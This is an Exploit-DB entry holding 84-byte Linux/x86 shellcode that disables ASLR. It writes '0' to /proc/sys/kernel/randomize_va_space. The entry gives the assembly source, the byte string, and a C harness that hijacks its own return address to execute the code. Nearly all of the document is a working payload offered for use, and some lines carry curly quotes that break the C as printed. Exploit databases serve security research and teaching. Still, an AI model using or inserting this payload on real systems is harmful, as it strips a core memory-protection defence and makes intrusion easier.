Linux/x86 - Disable ASLR Security Shellcode (84 bytes)

EDB-ID:

36637

CVE:

N/A

EDB Verified:

Author:

Mohammad Reza Ramezani

Type:

shellcode

Exploit:   /  

Platform:

Linux_x86

Date:

2015-04-03

Vulnerable App: 
/*
#Title: Disable ASLR in Linux (less byte and more compact)
#Length: 84 bytes
#Date: 3 April 2015
#Author: Mohammad Reza  Ramezani (mr.ramezani.edu@gmail.com - g+) 
#Tested On: kali-linux-1.0.6-i386

Thanks to stackoverflow



section .text
global _start

_start:

jmp short fileaddress
shellcode:
pop ebx
xor eax,eax
mov byte [ebx + 35],al
push byte 5
pop eax
push byte 2
pop ecx
int 80h

mov ebx, eax
push byte 4
pop eax
jmp short output
cont:
pop ecx
push byte 2
pop edx
int 80h

push byte 1
pop eax
xor ebx, ebx
int 80h

fileaddress:
call shellcode
db '/proc/sys/kernel/randomize_va_spaceX'

output:
call cont
db '0',10
*/

char shellcode[] = "\xeb\x22\x5b\x31\xc0\x88\x43\x23\x6a\x05\x58"
"\x6a\x02\x59\xcd\x80\x89\xc3\x6a\x04\x58\xeb\x36\x59\x6a\x02\x5a”
“\xcd\x80\x6a\x01\x58\x31\xdb\xcd\x80\xe8\xd9\xff\xff\xff\x2f\x70”
“\x72\x6f\x63\x2f\x73\x79\x73\x2f\x6b\x65\x72\x6e\x65\x6c\x2f\x72”
“\x61\x6e\x64\x6f\x6d\x69\x7a\x65\x5f\x76\x61\x5f\x73\x70\x61\x63”
“\x65\x58\xe8\xc5\xff\xff\xff\x30\x0a";

int main()
{
	int *ret;
	ret = (int *)&ret + 2;
	(*ret) = (int)shellcode;
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services